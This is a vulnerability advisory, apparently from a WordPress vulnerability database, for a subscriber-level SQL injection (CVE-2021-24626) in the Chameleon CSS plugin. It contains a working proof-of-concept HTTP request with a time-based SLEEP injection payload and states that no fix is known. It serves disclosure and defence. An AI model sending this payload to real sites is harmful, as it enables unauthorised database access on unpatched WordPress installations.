Chameleon CSS <= 1.2 – Subscriber+ SQL Injection | CVE 2021-24626 | Plugin Vulnerabilities

Description

The plugin does not have any CSRF and capability checks in all its AJAX calls, allowing any authenticated user, such as subscriber to call them and perform unauthorised actions. One of AJAX call, remove_css, also does not sanitise or escape the css_id POST parameter before using it in a SQL statement, leading to a SQL Injection

Proof of Concept

POST /wp-admin/admin-ajax.php HTTP/1.1
Content-Length: 35
Accept: */*
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Accept-Language: en-US,en;q=0.9
Cookie: [any authenticated user, like subscriber+]

action=remove_css&css_id=1%20AND%20(SELECT%207806 FROM%20(SELECT(SLEEP(5)))CVtK)

Affects Plugins

No known fix

References

CVE

URL

https://codevigilant.com/disclosure/2021/wp-plugin-chameleon-css/

Classification

Type

SQLI

OWASP top 10

CWE

CVSS

Miscellaneous

Original Researcher

Shreya Pohekar of Codevigilant Project

Verified

Yes

WPVDB ID

06cb6c14-99b8-45b6-be2e-f4dcca8a4165

Timeline

Publicly Published

2021-10-07 (about 2 years ago)

Added

2021-10-07 (about 2 years ago)

Last Updated

2022-04-12 (about 2 years ago)

Other

Published

Title

Published

2023-05-23

Title

Multiple Page Generator – MPG < 3.3.20 - SQL Injection

Published

2022-03-08

Title

WP Block and Stop Bad Bots < 6.88 - Unauthenticated SQLi

Published

2023-12-04

Title

Adifier System < 3.1.4 - Unauthenticated SQL Injection

Published

2024-03-26

Title

Calendarista < 15.5.9 - Authenticated (Subscriber+) SQL Injection

Published

2015-10-12

Title

Pie-Register <= 2.0.18 - Authenticated Blind SQL Injection